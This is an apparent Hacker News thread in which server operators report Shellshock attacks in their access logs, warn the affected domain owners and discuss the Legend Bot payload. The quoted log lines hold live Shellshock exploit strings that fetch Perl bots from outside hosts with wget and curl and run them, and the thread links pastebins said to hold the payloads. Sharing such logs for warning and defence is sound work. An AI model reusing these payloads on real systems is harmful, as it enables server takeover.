5 ms·
It is in the wild. As seen on my machine, on a domain name that I use only for email at the moment: XXX.access.log:174.143.168.121 - - [30/Sep/2014:12:40:21 -0
by guylhem 12y ago
It is in the wild. As seen on my machine, on a domain name that I use only for email at the moment:
XXX.access.log:174.143.168.121 - - [30/Sep/2014:12:40:21 -0400] "GET //cgi-bin/bash HTTP/1.0" 404 168 "-" "() { :;}; /bin/bash -c \x22wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\x22"
The payload is a perl script, which I posted to http://pastebin.ca/2850380 http://pastebin.ca/2850380
I suggest the utmost caution. I am emailing the domain owner to warn about what is being done (as the most likely is this poor chap domain was exploited, since it shows a Plesk page)
EDIT: email text (feel free to copy and paste if you see similar things in your logs)
Dear XXX,
I found your email as the contact for the domain YYYY.
I noticed just a few minutes ago that your server was being used to try and attack my server, by spreading a program designed to take control of machines vulnerable to what is called the "shellshock bug"
This malicious program has been hosted on a file publically accessible using http://XXXXX/legend.txt http://XXXXX/legend.txt
I strongly recommand you get in touch with your administrator or whoever is maintaining your machine to let them know that. Just removing the file may not be enough, as your server must have been "infected" in some way for that to happen without you knowing.
Sorry to be the bearer of bad news, but I believe I should let you know ASAP, as I would certainly appreciate being warned should the situation have been reversed :-(
Sorry,
Charles
EDIT2: if you want to discuss the code, https://news.ycombinator.com/item?id=8392666 https://news.ycombinator.com/item?id=8392666
- meowface 12y ago"In the wild" is an understatement; at the current moment the scanning traffic is nearly worm-level (though this is not nearly as wormable as some of the classic worms of olde). Within about an hour of the first public disclosure, bots started scanning for it: some white hat, others not so much. Big websites are seeing scans from bots run by 50 or more different unrelated entities at the moment. It's really easy for just about anyone to hack together a quick script that scans for and exploits this vulnerability. This is not to fear monger though: for 99.9% of web applications out there, the scans will not find anything vulnerable to Shellshock. Unless you're running a CGI app, you generally won't have to worry from a web app perspective even if you are vulnerable. You may have to worry if you host a Git or SVN repo, or expose a mail daemon, etc. It's nice of you to inform the admin but unfortunately compromised servers running Plesk have been used to serve malware for many years now. You will find tens of thousands out there on the web, many probably abandoned and forgotten by their owners.
- doctorshady 12y agoAre the bots scanning for anything besides HTTP-based Shellshock vulnerabilities?
- blhack 12y agoWow, that same machine is hitting one of my servers. Interesting.
- personalcompute 12y ago3rd that - Exact same ip and domain.
- buro9 12y agoI've also seen some in the wild, and I'm behind CloudFlare. CloudFlare have stopped the attacks reaching us now, but a few got through on the 29th September (this is a Pro account). I'm not sure precisely when the CloudFlare protection started, but all servers involved were patched as soon as the patches were available (before the first attacks reached my servers). The log file entries: 200.91.29.35 - - [29/Sep/2014:17:18:44 +0000] "GET /conversations/626/&sa=U&ei=IoYpVKPNNMPmsASpzoLwAg&ved=0CJoBEBYwFzi8BQ&usg=AFQjCNHTmJMWiGvhfCfRFEM_vtu6-SSafQ//cgi-bin/env.pl HTTP/1.1" 301 5 "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" 200.91.29.35 - - [29/Sep/2014:17:18:45 +0000] "GET /conversations/626/%26amp%3Bsa%3DU%26amp%3Bei%3DIoYpVKPNNMPmsASpzoLwAg%26amp%3Bved%3D0CJoBEBYwFzi8BQ%26amp%3Busg%3DAFQjCNHTmJMWiGvhfCfRFEM_vtu6-SSafQ//cgi-bin/env.pl/ HTTP/1.1" 404 10779 "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" 200.91.29.35 - - [29/Sep/2014:17:18:45 +0000] "GET //cgi-bin/env.pl HTTP/1.1" 301 5 "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" 200.91.29.35 - - [29/Sep/2014:17:18:46 +0000] "GET /cgi-bin/env.pl/ HTTP/1.1" 404 10637 "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" 200.91.29.35 - - [29/Sep/2014:17:18:46 +0000] "GET /conversations/626//cgi-bin/env.pl HTTP/1.1" 301 5 "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" 200.91.29.35 - - [29/Sep/2014:17:18:47 +0000] "GET /conversations/626//cgi-bin/env.pl/ HTTP/1.1" 404 10656 "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\x22;" The pastebin of the PERL script at the other end: http://pastebin.ca/2850408 http://pastebin.ca/2850408
- mahouse 12y agomy $realname = '$uname'; They probably meant $uname or at least "$uname" :-)
- pja 12y agoI've been emailing the abuse contacts for the source ip address in the logs with the relevant log snippet. Some hosting providers are more responsive than others it has to be said - I've had no response at all from some big name hosting companies whilst others have been very quick to sort things out.
- angelofm 12y agoFirst thing I noticed was this: "Legend Bot [2011] DO NOT FUCKIN SHARE!" on the comments, does this mean they have been running this since 2011? I hope not.
- jonasvp 12y agoThe bot does not have anything to do with shellshock by itself. The shellshock exploit is just used to download the (generic) Legend Bot in order to remotely send commands to the machine.